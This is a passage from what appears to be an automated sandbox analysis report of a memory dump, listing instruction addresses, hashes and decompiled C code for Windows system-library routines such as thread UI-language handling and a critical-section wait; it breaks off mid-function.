0x04b25b9c
0x04b25ba0
0x04b25ba3
0x04b25bab
0x04b25bb0
0x04b25bb3
0x04b25bb3
0x04b25ba3
0x04ae2724
0x04ae2726
0x04ae2729
0x04ae272c
0x04ae279d
0x04ae279d
0x04ae27a0
0x04ae27a2
0x00000000
0x04ae272e
0x04ae272e
0x04ae2731
0x04ae2734
0x04ae2734
0x04ae2736
0x04b25bc1
0x04b25bc1
0x04b25bc4
0x00000000
0x04b25bca
0x04b25bca
0x04b25bcd
0x00000000
0x04b25bd3
0x00000000
0x04b25bd3
0x04b25bcd
0x04ae273c
0x04ae273c
0x04ae2742
0x04ae2747
0x04ae274a
0x04ae274d
0x04ae2750
0x00000000
0x04ae2756
0x04ae2756
0x00000000
0x04ae2902
0x04ae2908
0x04ae290b
0x00000000
0x04ae2911
0x04ae291c
0x04ae2921
0x00000000
0x04ae2921
0x00000000
0x00000000
0x04ae2880
0x04ae2887
0x04ae288c
0x00000000
0x00000000
0x04ae2805
0x04ae280a
0x04ae2814
0x04ae2816
0x00000000
0x00000000
0x04ae281e
0x04ae2821
0x04ae2823
0x00000000
0x04ae2829
0x04ae2829
0x04ae2831
0x04ae283c
0x04ae283e
0x00000000
0x04ae283e
0x00000000
0x00000000
0x04ae284e
0x04ae2850
0x04ae2851
0x04ae2854
0x04ae2857
0x04ae285a
0x04ae285c
0x04ae285d
0x00000000
0x00000000
0x04ae275d
0x04ae2761
0x00000000
0x04ae2767
0x04ae276e
0x04ae2773
0x04ae2773
0x04ae2776
0x04ae2778
0x04ae277e
0x04ae277e
0x04ae2781
0x04ae2781
0x04ae2783
0x04ae2784
0x00000000
0x00000000
0x04b25bd8
0x04b25bde
0x04b25be4
0x04b25be6
0x04b25be8
0x04b25be9
0x04b25bee
0x04b25bf8
0x04b25bff
0x04b25c01
0x04b25c04
0x04b25c07
0x04b25c0b
0x04b25c0d
0x04b25c0d
0x04b25c15
0x04b25c18
0x04b25c1b
0x04b25c1b
0x04b25c1e
0x00000000
0x00000000
0x04ae28c3
0x04ae28c8
0x04ae28d2
0x04ae28d4
0x04ae28d8
0x04ae28db
0x04b25c26
0x04b25c28
0x04b25c2d
0x04b25c2d
0x00000000
0x00000000
0x04b25c34
0x04b25c36
0x04b25c49
0x04b25c4e
0x04b25c54
0x04b25c5b
0x04b25c5d
0x04b25c60
0x04ae2788
0x04ae2788
0x04ae278b
0x04ae278e
0x04ae278e
0x04ae278e
0x04ae2791
0x00000000
0x00000000
0x04ae2756
0x04ae2750
0x00000000
0x04ae2794
0x04ae2794
0x04ae2795
0x04ae2798
0x04ae2798
0x00000000
0x04ae2734
0x04ae272c
0x04ae2700
0x04ae25ef
0x04ae25ef
0x04ae25ef
0x04ae25f2
0x04ae25f8
0x00000000
0x00000000
0x04ae25fe
0x00000000
0x04ae28e6
0x04ae28ec
0x04ae28ef
0x04ae28f5
0x04ae28f8
0x04ae28f8
0x00000000
0x04ae28f8
0x00000000
0x00000000
0x04ae2866
0x04ae2866
0x04ae2876
0x04ae2879
0x00000000
0x00000000
0x04ae27e0
0x04ae27e7
0x04ae27e9
0x04ae27eb
0x04b25afd
0x00000000
0x04b25afd
0x00000000
0x00000000
0x04ae2633
0x04ae2638
0x04ae263b
0x04ae263c
0x04ae263e
0x04ae2640
0x04ae2642
0x04ae2647
0x04ae2649
0x04ae264e
0x04ae2650
0x04ae2653
0x04ae2659
0x04ae26a2
0x04ae26a7
0x04ae26ac
0x04ae26b2
0x04b25b11
0x04b25b15
0x04b25b17
0x00000000
0x04ae26b8
0x04ae26b8
0x04ae26ba
0x04ae27a6
0x04ae27a6
0x04ae27a9
0x04ae27ab
0x04ae27b9
0x04ae27b9
0x04ae27be
0x04ae27c1
0x04ae27c3
0x04ae27c5
0x04ae27c7
0x04b25c74
0x04b25c79
0x04b25c79
0x04ae27c7
0x00000000
0x04ae26c0
0x04ae26c0
0x04ae26c3
0x04ae26c6
0x04ae26c6
0x04ae26c9
0x04ae26c9
0x00000000
0x04ae26c9
0x04ae26ba
0x04ae265b
0x04ae265b
0x04ae265e
0x04ae2667
0x04ae266d
0x04ae2677
0x04ae267c
0x04ae267f
0x04ae2681
0x04b25b49
0x04b25b4e
0x04ae27cd
0x04ae27d0
0x04ae27d1
0x04ae27d2
0x04ae27d4
0x04ae27dd
0x04ae2687
0x04ae2687
0x04ae268a
0x04ae268b
0x04ae268e
0x04ae268f
0x04ae2691
0x04ae2696
0x04ae2698
0x04ae269d
0x04ae269f
0x00000000
0x04ae269f
0x04ae2681
0x00000000
0x00000000
0x04ae2846
0x00000000
0x00000000
0x04ae2605
0x04ae260a
0x04ae260c
0x04ae2611
0x04ae2616
0x04ae2619
0x04ae2619
0x04ae261e
0x00000000
0x04ae2624
0x04ae2627
0x04ae2627
0x00000000
0x00000000
0x04b25b1f
0x00000000
0x00000000
0x04ae2894
0x04ae289b
0x04ae289d
0x04ae28a1
0x04b25b2b
0x04b25b2e
0x04b25b2e
0x04ae28a7
0x04ae28a9
0x04b25b04
0x04b25b09
0x04b25b09
0x04b25b09
0x00000000
0x00000000
0x04b25b35
0x04b25b3c
0x04ae28fb
0x04ae28fb
0x04ae26cc
0x04ae26cc
0x04ae26d0
0x00000000
0x04ae26d2
0x04ae26d2
0x00000000
0x04ae26d2
0x00000000
0x00000000
0x04ae25fe
0x04ae292d
0x04ae292f
0x04ae2930
0x04ae2935
0x04ae2937
0x04ae293a
0x04ae2942
0x04ae2946
0x04ae2952
0x04ae295a
0x04ae2962
0x04ae2963
0x04ae2966
0x04ae296e
0x04ae296f
0x04ae2972
0x04ae2977
0x04ae297a
0x04ae297d
0x04ae297e
0x04ae297f
0x04ae2980
0x04ae2981
0x04ae2982
0x04ae2983
0x04ae2984
0x04ae2985
0x04ae2986
0x04ae2987
0x04ae2988
0x04ae2989
0x04ae298a
0x04ae298b
0x04ae298c
0x04ae298d
0x04ae298e
0x04ae298f
0x04ae2990
0x04ae2992
0x04ae2997
0x04ae29a3
0x04ae29a6
0x04ae29ab
0x04ae29ad
0x04ae29b0
0x04ae29b2
0x04b25c80
0x04ae29b8
0x04ae29b8
0x04ae29bb
0x04ae29c0
0x04ae29c5
0x04ae29c6
0x04ae29c6
0x04ae29c9
0x04ae29cb
0x00000000
0x00000000
0x04ae29cd
0x04ae29d0
0x04ae29d9
0x04ae29db
0x04ae29dd
0x04ae2a7f
0x04ae2a84
0x04ae2a87
0x04ae2a89
0x04b25ca1
0x04b25ca3
0x00000000
0x04ae2a8f
0x04ae2a8f
0x00000000
0x04ae2a8f
0x00000000
0x04ae29e3
0x04ae29e3
0x04ae29e3
0x00000000
0x04ae29e3
0x04ae29dd
0x00000000
0x04ae29db
0x04ae29e6
0x04ae29e9
0x04ae29eb
0x04ae29ed
0x04ae29f3
0x04ae29f5
0x04ae29f8
0x04ae29fa
0x04ae2a97
0x04ae2a9a
0x04ae2a9d
0x04ae2add
0x00000000
0x04ae2a9f
0x04ae2aa2
0x04ae2aa5
0x04ae2aa8
0x04ae2aab
0x04b25cab
0x04b25caf
0x04b25cc5
0x04b25cda
0x04b25cdc
0x04b25cdf
0x04b25ce5
0x00000000
0x04b25ceb
0x04b25ced
0x04b25cee
0x00000000
0x04b25cee
0x04b25cb1
0x04b25cb4
0x04b25cb9
0x04b25cbb
0x00000000
0x04b25cbd
0x04b25cbd
0x00000000
0x04b25cbd
0x04b25cbb
0x04ae2ab1
0x04ae2ab1
0x04ae2ac4
0x04ae2ac6
0x04ae2ac6
0x00000000
0x04ae2ac6
0x04ae2aab
0x00000000
0x04ae2a00
0x04ae2a09
0x04ae2a0e
0x04ae2a21
0x04ae2a24
0x04ae2a35
0x04ae2a3a
0x04ae2a3d
0x04ae2a42
0x04ae2a59
0x04ae2a59
0x04ae2a5c
0x04ae2a5f
0x04ae2a5f
0x04ae29fa
0x04ae29f3
0x04ae2a64
0x04ae2a64
0x04ae2a6b
0x04ae2a6b
0x04ae2a6d
0x04ae2a72
0x04ae2a72
0x00000000

Strings

PATH, xrefs: 04AE2642, 04AE2691

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: PATH
API String ID: 0-1036084923
Opcode ID: 1535242789a96610b79f3372477355b5caf769409ffe93e44c9cf0f5b1fec270
Instruction ID: b8fb1e904e94f0f1e84a232218fd5ff97665f7c64676f08bfad771d2d2c7a87f
Opcode Fuzzy Hash: 1535242789a96610b79f3372477355b5caf769409ffe93e44c9cf0f5b1fec270
Instruction Fuzzy Hash: F6C191B2E00219EFDB24DF9AD981BBEB7B5FF48704F044169E511AB250E734B951CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04AEFAB0, Relevance: 1.6, Strings: 1, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 80%

			E04AEFAB0(void* __ebx, void* __esi, signed int _a8, signed int _a12) {
				char _v5;
				signed int _v8;
				signed int _v12;
				char _v16;
				char _v17;
				char _v20;
				signed int _v24;
				char _v28;
				char _v32;
				signed int _v40;
				void* __ecx;
				void* __edi;
				void* __ebp;
				signed int _t73;
				intOrPtr* _t75;
				signed int _t77;
				signed int _t79;
				signed int _t81;
				intOrPtr _t83;
				intOrPtr _t85;
				intOrPtr _t86;
				signed int _t91;
				signed int _t94;
				signed int _t95;
				signed int _t96;
				signed int _t106;
				signed int _t108;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t122;
				signed int _t123;
				void* _t129;
				signed int _t130;
				void* _t132;
				intOrPtr* _t134;
				signed int _t138;
				signed int _t141;
				signed int _t147;
				intOrPtr _t153;
				signed int _t154;
				signed int _t155;
				signed int _t170;
				void* _t174;
				signed int _t176;
				signed int _t177;

				_t129 = __ebx;
				_push(_t132);
				_push(__esi);
				_t174 = _t132;
				_t73 =  !( *( *(_t174 + 0x18)));
				if(_t73 >= 0) {
					L5:
					return _t73;
				} else {
					E04ACEEF0(0x4ba7b60);
					_t134 =  *0x4ba7b84; // 0x77ad7b80
					_t2 = _t174 + 0x24; // 0x24
					_t75 = _t2;
					if( *_t134 != 0x4ba7b80) {
						_push(3);
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x4ba7b60);
						_t170 = _v8;
						_v28 = 0;
						_v40 = 0;
						_v24 = 0;
						_v17 = 0;
						_v32 = 0;
						__eflags = _t170 & 0xffff7cf2;
						if((_t170 & 0xffff7cf2) != 0) {
							L43:
							_t77 = 0xc000000d;
						} else {
							_t79 = _t170 & 0x0000000c;
							__eflags = _t79;
							if(_t79 != 0) {
								__eflags = _t79 - 0xc;
								if(_t79 == 0xc) {
									goto L43;
								} else {
									goto L9;
								}
							} else {
								_t170 = _t170 | 0x00000008;
								__eflags = _t170;
								L9:
								_t81 = _t170 & 0x00000300;
								__eflags = _t81 - 0x300;
								if(_t81 == 0x300) {
									goto L43;
								} else {
									_t138 = _t170 & 0x00000001;
									__eflags = _t138;
									_v24 = _t138;
									if(_t138 != 0) {
										__eflags = _t81;
										if(_t81 != 0) {
											goto L43;
										} else {
											goto L11;
										}
									} else {
										L11:
										_push(_t129);
										_t77 = E04AC6D90( &_v20);
										_t130 = _t77;
										__eflags = _t130;
										if(_t130 >= 0) {
											_push(_t174);
											__eflags = _t170 & 0x00000301;
											if((_t170 & 0x00000301) == 0) {
												_t176 = _a8;
												__eflags = _t176;
												if(__eflags == 0) {
													L64:
													_t83 =  *[fs:0x18];
													_t177 = 0;
													__eflags =  *(_t83 + 0xfb8);
													if( *(_t83 + 0xfb8) != 0) {
														E04AC76E2( *((intOrPtr*)( *[fs:0x18] + 0xfb8)));
														 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = 0;
													}
													 *((intOrPtr*)( *[fs:0x18] + 0xfb8)) = _v12;
													goto L15;
												} else {
													asm("sbb edx, edx");
													_t114 = E04B58938(_t130, _t176, ( ~(_t170 & 4) & 0xffffffaf) + 0x55, _t170, _t176, __eflags);
													__eflags = _t114;
													if(_t114 < 0) {
														_push("*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!\n");
														E04ABB150();
													}
													_t116 = E04B56D81(_t176,  &_v16);
													__eflags = _t116;
													if(_t116 >= 0) {
														__eflags = _v16 - 2;
														if(_v16 < 2) {
															L56:
															_t118 = E04AC75CE(_v20, 5, 0);
															__eflags = _t118;
															if(_t118 < 0) {
																L67:
																_t130 = 0xc0000017;
																goto L32;
															} else {
																__eflags = _v12;
																if(_v12 == 0) {
																	goto L67;
																} else {
																	_t153 =  *0x4ba8638; // 0x960f90
																	_t122 = L04AC38A4(_t153, _t176, _v16, _t170 | 0x00000002, 0x1a, 5,  &_v12);
																	_t154 = _v12;
																	_t130 = _t122;
																	__eflags = _t130;
																	if(_t130 >= 0) {
																		_t123 =  *(_t154 + 4) & 0x0000ffff;
																		__eflags = _t123;
																		if(_t123 != 0) {
																			_t155 = _a12;
																			__eflags = _t155;
																			if(_t155 != 0) {
																				 *_t155 = _t123;
																			}
																			goto L64;
																		} else {
																			E04AC76E2(_t154);
																			goto L41;
																		}
																	} else {
																		E04AC76E2(_t154);
																		_t177 = 0;
																		goto L18;
																	}
																}
															}
														} else {
															__eflags =  *_t176;
															if( *_t176 != 0) {
																goto L56;
															} else {
																__eflags =  *(_t176 + 2);
																if( *(_t176 + 2) == 0) {
																	goto L64;
																} else {
																	goto L56;
																}
															}
														}
													} else {
														_t130 = 0xc000000d;
														goto L32;
													}
												}
												goto L35;
											} else {
												__eflags = _a8;
												if(_a8 != 0) {
													_t77 = 0xc000000d;
												} else {
													_v5 = 1;
													L04AEFCE3(_v20, _t170);
													_t177 = 0;
													__eflags = 0;
													L15:
													_t85 =  *[fs:0x18];
													__eflags =  *((intOrPtr*)(_t85 + 0xfc0)) - _t177;
													if( *((intOrPtr*)(_t85 + 0xfc0)) == _t177) {
														L18:
														__eflags = _t130;
														if(_t130 != 0) {
															goto L32;
														} else {
															__eflags = _v5 - _t130;
															if(_v5 == _t130) {
																goto L32;
															} else {
																_t86 =  *[fs:0x18];
																__eflags =  *((intOrPtr*)(_t86 + 0xfbc)) - _t177;
																if( *((intOrPtr*)(_t86 + 0xfbc)) != _t177) {
																	_t177 =  *( *( *[fs:0x18] + 0xfbc));
																}
																__eflags = _t177;
																if(_t177 == 0) {
																	L31:
																	__eflags = 0;
																	L04AC70F0(_t170 | 0x00000030,  &_v32, 0,  &_v28);
																	goto L32;
																} else {
																	__eflags = _v24;
																	_t91 =  *(_t177 + 0x20);
																	if(_v24 != 0) {
																		 *(_t177 + 0x20) = _t91 & 0xfffffff9;
																		goto L31;
																	} else {
																		_t141 = _t91 & 0x00000040;
																		__eflags = _t170 & 0x00000100;
																		if((_t170 & 0x00000100) == 0) {
																			__eflags = _t141;
																			if(_t141 == 0) {
																				L74:
																				_t94 = _t91 & 0xfffffffd | 0x00000004;
																				goto L27;
																			} else {
																				_t177 = E04AEFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					goto L42;
																				} else {
																					_t130 = E04AEFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						_t68 = _t177 + 0x20;
																						 *_t68 =  *(_t177 + 0x20) & 0xffffffbf;
																						__eflags =  *_t68;
																						_t91 =  *(_t177 + 0x20);
																						goto L74;
																					}
																				}
																			}
																			goto L35;
																		} else {
																			__eflags = _t141;
																			if(_t141 != 0) {
																				_t177 = E04AEFD22(_t177);
																				__eflags = _t177;
																				if(_t177 == 0) {
																					L42:
																					_t77 = 0xc0000001;
																					goto L33;
																				} else {
																					_t130 = E04AEFD9B(_t177, 0, 4);
																					__eflags = _t130;
																					if(_t130 != 0) {
																						goto L42;
																					} else {
																						 *(_t177 + 0x20) =  *(_t177 + 0x20) & 0xffffffbf;
																						_t91 =  *(_t177 + 0x20);
																						goto L26;
																					}
																				}
																				goto L35;
																			} else {
																				L26:
																				_t94 = _t91 & 0xfffffffb | 0x00000002;
																				__eflags = _t94;
																				L27:
																				 *(_t177 + 0x20) = _t94;
																				__eflags = _t170 & 0x00008000;
																				if((_t170 & 0x00008000) != 0) {
																					_t95 = _a12;
																					__eflags = _t95;
																					if(_t95 != 0) {
																						_t96 =  *_t95;
																						__eflags = _t96;
																						if(_t96 != 0) {
																							 *((short*)(_t177 + 0x22)) = 0;
																							_t40 = _t177 + 0x20;
																							 *_t40 =  *(_t177 + 0x20) | _t96 << 0x00000010;
																							__eflags =  *_t40;
																						}
																					}
																				}
																				goto L31;
																			}
																		}
																	}
																}
															}
														}
													} else {
														_t147 =  *( *[fs:0x18] + 0xfc0);
														_t106 =  *(_t147 + 0x20);
														__eflags = _t106 & 0x00000040;
														if((_t106 & 0x00000040) != 0) {
															_t147 = E04AEFD22(_t147);
															__eflags = _t147;
															if(_t147 == 0) {
																L41:
																_t130 = 0xc0000001;
																L32:
																_t77 = _t130;
																goto L33;
															} else {
																 *(_t147 + 0x20) =  *(_t147 + 0x20) & 0xffffffbf;
																_t106 =  *(_t147 + 0x20);
																goto L17;
															}
															goto L35;
														} else {
															L17:
															_t108 = _t106 | 0x00000080;
															__eflags = _t108;
															 *(_t147 + 0x20) = _t108;
															 *( *[fs:0x18] + 0xfc0) = _t147;
															goto L18;
														}
													}
												}
											}
											L33:
										}
									}
								}
							}
						}
						L35:
						return _t77;
					} else {
						 *_t75 = 0x4ba7b80;
						 *((intOrPtr*)(_t75 + 4)) = _t134;
						 *_t134 = _t75;
						 *0x4ba7b84 = _t75;
						_t73 = E04ACEB70(_t134, 0x4ba7b60);
						if( *0x4ba7b20 != 0) {
							_t73 =  *( *[fs:0x30] + 0xc);
							if( *((char*)(_t73 + 0x28)) == 0) {
								_t73 = E04ACFF60( *0x4ba7b20);
							}
						}
						goto L5;
					}
				}
			}

0x04aefab0
0x04aefab2
0x04aefab3
0x04aefab4
0x04aefabc
0x04aefac0
0x04aefb14
0x04aefb17
0x04aefac2
0x04aefac8
0x04aefacd
0x04aefad3
0x04aefad3
0x04aefadd
0x04aefb18
0x04aefb1b
0x04aefb1d
0x04aefb1e
0x04aefb1f
0x04aefb20
0x04aefb21
0x04aefb22
0x04aefb23
0x04aefb24
0x04aefb25
0x04aefb26
0x04aefb27
0x04aefb28
0x04aefb29
0x04aefb2a
0x04aefb2b
0x04aefb2c
0x04aefb2d
0x04aefb2e
0x04aefb2f
0x04aefb3a
0x04aefb3b
0x04aefb3e
0x04aefb41
0x04aefb44
0x04aefb47
0x04aefb4a
0x04aefb4d
0x04aefb53
0x04b2bdcb
0x04b2bdcb
0x04aefb59
0x04aefb5b
0x04aefb5b
0x04aefb5e
0x04b2bdd5
0x04b2bdd8
0x00000000
0x04b2bdda
0x00000000
0x04b2bdda
0x04aefb64
0x04aefb64
0x04aefb64
0x04aefb67
0x04aefb6e
0x04aefb70
0x04aefb72
0x00000000
0x04aefb78
0x04aefb7a
0x04aefb7a
0x04aefb7d
0x04aefb80
0x04b2bddf
0x04b2bde1
0x00000000
0x04b2bde3
0x00000000
0x04b2bde3
0x04aefb86
0x04aefb86
0x04aefb86
0x04aefb8b
0x04aefb90
0x04aefb92
0x04aefb94
0x04aefb9a
0x04aefb9b
0x04aefba1
0x04b2bde8
0x04b2bdeb
0x04b2bded
0x04b2beb5
0x04b2beb5
0x04b2bebb
0x04b2bebd
0x04b2bec3
0x04b2bed2
0x04b2bedd
0x04b2bedd
0x04b2beed
0x00000000
0x04b2bdf3
0x04b2bdfe
0x04b2be06
0x04b2be0b
0x04b2be0d
0x04b2be0f
0x04b2be14
0x04b2be19
0x04b2be20
0x04b2be25
0x04b2be27
0x04b2be35
0x04b2be39
0x04b2be46
0x04b2be4f
0x04b2be54
0x04b2be56
0x04b2bef8
0x04b2bef8
0x00000000
0x04b2be5c
0x04b2be5c
0x04b2be60
0x00000000
0x04b2be66
0x04b2be66
0x04b2be7f
0x04b2be84
0x04b2be87
0x04b2be89
0x04b2be8b
0x04b2be99
0x04b2be9d
0x04b2bea0
0x04b2beac
0x04b2beaf
0x04b2beb1
0x04b2beb3
0x04b2beb3
0x00000000
0x04b2bea2
0x04b2bea2
0x00000000
0x04b2bea2
0x04b2be8d
0x04b2be8d
0x04b2be92
0x00000000
0x04b2be92
0x04b2be8b
0x04b2be60
0x04b2be3b
0x04b2be3b
0x04b2be3e
0x00000000
0x04b2be40
0x04b2be40
0x04b2be44
0x00000000
0x00000000
0x00000000
0x00000000
0x04b2be44
0x04b2be3e
0x04b2be29
0x04b2be29
0x00000000
0x04b2be29
0x04b2be27
0x00000000
0x04aefba7
0x04aefba7
0x04aefbab
0x04b2bf02
0x04aefbb1
0x04aefbb1
0x04aefbb8
0x04aefbbd
0x04aefbbd
0x04aefbbf
0x04aefbbf
0x04aefbc5
0x04aefbcb
0x04aefbf8
0x04aefbf8
0x04aefbfa
0x00000000
0x04aefc00
0x04aefc00
0x04aefc03
0x00000000
0x04aefc09
0x04aefc09
0x04aefc0f
0x04aefc15
0x04aefc23
0x04aefc23
0x04aefc25
0x04aefc27
0x04aefc75
0x04aefc7c
0x04aefc84
0x00000000
0x04aefc29
0x04aefc29
0x04aefc2d
0x04aefc30
0x04b2bf0f
0x00000000
0x04aefc36
0x04aefc38
0x04aefc3b
0x04aefc41
0x04b2bf17
0x04b2bf19
0x04b2bf48
0x04b2bf4b
0x00000000
0x04b2bf1b
0x04b2bf22
0x04b2bf24
0x04b2bf26
0x00000000
0x04b2bf2c
0x04b2bf37
0x04b2bf39
0x04b2bf3b
0x00000000
0x04b2bf41
0x04b2bf41
0x04b2bf41
0x04b2bf41
0x04b2bf45
0x00000000
0x04b2bf45
0x04b2bf3b
0x04b2bf26
0x00000000
0x04aefc47
0x04aefc47
0x04aefc49
0x04aefcb2
0x04aefcb4
0x04aefcb6
0x04aefcdc
0x04aefcdc
0x00000000
0x04aefcb8
0x04aefcc3
0x04aefcc5
0x04aefcc7
0x00000000
0x04aefcc9
0x04aefcc9
0x04aefccd
0x00000000
0x04aefccd
0x04aefcc7
0x00000000
0x04aefc4b
0x04aefc4b
0x04aefc4e
0x04aefc4e
0x04aefc51
0x04aefc51
0x04aefc54
0x04aefc5a
0x04aefc5c
0x04aefc5f
0x04aefc61
0x04aefc63
0x04aefc65
0x04aefc67
0x04aefc6e
0x04aefc72
0x04aefc72
0x04aefc72
0x04aefc72
0x04aefc67
0x04aefc61
0x00000000
0x04aefc5a
0x04aefc49
0x04aefc41
0x04aefc30
0x04aefc27
0x04aefc03
0x04aefbcd
0x04aefbd3
0x04aefbd9
0x04aefbdc
0x04aefbde
0x04aefc99
0x04aefc9b
0x04aefc9d
0x04aefcd5
0x04aefcd5
0x04aefc89
0x04aefc89
0x00000000
0x04aefc9f
0x04aefc9f
0x04aefca3
0x00000000
0x04aefca3
0x00000000
0x04aefbe4
0x04aefbe4
0x04aefbe4
0x04aefbe4
0x04aefbe9
0x04aefbf2
0x00000000
0x04aefbf2
0x04aefbde
0x04aefbcb
0x04aefbab
0x04aefc8b
0x04aefc8b
0x04aefc8c
0x04aefb80
0x04aefb72
0x04aefb5e
0x04aefc8d
0x04aefc91
0x04aefadf
0x04aefadf
0x04aefae1
0x04aefae4
0x04aefae7
0x04aefaec
0x04aefaf8
0x04aefb00
0x04aefb07
0x04aefb0f
0x04aefb0f
0x04aefb07
0x00000000
0x04aefaf8
0x04aefadd

Strings

*** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 04B2BE0F

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
API String ID: 0-865735534
Opcode ID: b69e9697343b13f141dc649a79e760fc4fb5afc409c127d7a4db3d47b505556d
Instruction ID: 514750e78e8e9aafad82c9494bed99950c371a0db533073a446c2a30c5a367d1
Opcode Fuzzy Hash: b69e9697343b13f141dc649a79e760fc4fb5afc409c127d7a4db3d47b505556d
Instruction Fuzzy Hash: 9CA11871B04615AFEB65DF66C55077AB3B5EF84714F1449ADF82ACB680EB30F8018B90

Uniqueness

Uniqueness Score: -1.00%

Function 04AB2D8A, Relevance: 1.4, Strings: 1, Instructions: 191
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E04AB2D8A(void* __ebx, signed char __ecx, signed int __edx, signed int __edi) {
				signed char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				signed int _v52;
				void* __esi;
				void* __ebp;
				intOrPtr _t55;
				signed int _t57;
				signed int _t58;
				char* _t62;
				signed char* _t63;
				signed char* _t64;
				signed int _t67;
				signed int _t72;
				signed int _t77;
				signed int _t78;
				signed int _t88;
				intOrPtr _t89;
				signed char _t93;
				signed int _t97;
				signed int _t98;
				signed int _t102;
				signed int _t103;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				signed char _t109;
				signed int _t111;
				void* _t116;

				_t102 = __edi;
				_t97 = __edx;
				_v12 = _v12 & 0x00000000;
				_t55 =  *[fs:0x18];
				_t109 = __ecx;
				_v8 = __edx;
				_t86 = 0;
				_v32 = _t55;
				_v24 = 0;
				_push(__edi);
				if(__ecx == 0x4ba5350) {
					_t86 = 1;
					_v24 = 1;
					 *((intOrPtr*)(_t55 + 0xf84)) = 1;
				}
				_t103 = _t102 | 0xffffffff;
				if( *0x4ba7bc8 != 0) {
					_push(0xc000004b);
					_push(_t103);
					E04AF97C0();
				}
				if( *0x4ba79c4 != 0) {
					_t57 = 0;
				} else {
					_t57 = 0x4ba79c8;
				}
				_v16 = _t57;
				if( *((intOrPtr*)(_t109 + 0x10)) == 0) {
					_t93 = _t109;
					L23();
				}
				_t58 =  *_t109;
				if(_t58 == _t103) {
					__eflags =  *(_t109 + 0x14) & 0x01000000;
					_t58 = _t103;
					if(__eflags == 0) {
						_t93 = _t109;
						E04AE1624(_t86, __eflags);
						_t58 =  *_t109;
					}
				}
				_v20 = _v20 & 0x00000000;
				if(_t58 != _t103) {
					 *((intOrPtr*)(_t58 + 0x14)) =  *((intOrPtr*)(_t58 + 0x14)) + 1;
				}
				_t104 =  *((intOrPtr*)(_t109 + 0x10));
				_t88 = _v16;
				_v28 = _t104;
				L9:
				while(1) {
					if(E04AD7D50() != 0) {
						_t62 = ( *[fs:0x30])[0x50] + 0x228;
					} else {
						_t62 = 0x7ffe0382;
					}
					if( *_t62 != 0) {
						_t63 =  *[fs:0x30];
						__eflags = _t63[0x240] & 0x00000002;
						if((_t63[0x240] & 0x00000002) != 0) {
							_t93 = _t109;
							E04B4FE87(_t93);
						}
					}
					if(_t104 != 0xffffffff) {
						_push(_t88);
						_push(0);
						_push(_t104);
						_t64 = E04AF9520();
						goto L15;
					} else {
						while(1) {
							_t97 =  &_v8;
							_t64 = E04AEE18B(_t109 + 4, _t97, 4, _t88, 0);
							if(_t64 == 0x102) {
								break;
							}
							_t93 =  *(_t109 + 4);
							_v8 = _t93;
							if((_t93 & 0x00000002) != 0) {
								continue;
							}
							L15:
							if(_t64 == 0x102) {
								break;
							}
							_t89 = _v24;
							if(_t64 < 0) {
								L04B0DF30(_t93, _t97, _t64);
								_push(_t93);
								_t98 = _t97 | 0xffffffff;
								__eflags =  *0x4ba6901;
								_push(_t109);
								_v52 = _t98;
								if( *0x4ba6901 != 0) {
									_push(0);
									_push(1);
									_push(0);
									_push(0x100003);
									_push( &_v12);
									_t72 = E04AF9980();
									__eflags = _t72;
									if(_t72 < 0) {
										_v12 = _t98 | 0xffffffff;
									}
								}
								asm("lock cmpxchg [ecx], edx");
								_t111 = 0;
								__eflags = 0;
								if(0 != 0) {
									__eflags = _v12 - 0xffffffff;
									if(_v12 != 0xffffffff) {
										_push(_v12);
										E04AF95D0();
									}
								} else {
									_t111 = _v12;
								}
								return _t111;
							} else {
								if(_t89 != 0) {
									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
									_t77 = E04AD7D50();
									__eflags = _t77;
									if(_t77 == 0) {
										_t64 = 0x7ffe0384;
									} else {
										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
									}
									__eflags =  *_t64;
									if( *_t64 != 0) {
										_t64 =  *[fs:0x30];
										__eflags = _t64[0x240] & 0x00000004;
										if((_t64[0x240] & 0x00000004) != 0) {
											_t78 = E04AD7D50();
											__eflags = _t78;
											if(_t78 == 0) {
												_t64 = 0x7ffe0385;
											} else {
												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
											}
											__eflags =  *_t64 & 0x00000020;
											if(( *_t64 & 0x00000020) != 0) {
												_t64 = E04B37016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
											}
										}
									}
								}
								return _t64;
							}
						}
						_t97 = _t88;
						_t93 = _t109;
						E04B4FDDA(_t97, _v12);
						_t105 =  *_t109;
						_t67 = _v12 + 1;
						_v12 = _t67;
						__eflags = _t105 - 0xffffffff;
						if(_t105 == 0xffffffff) {
							_t106 = 0;
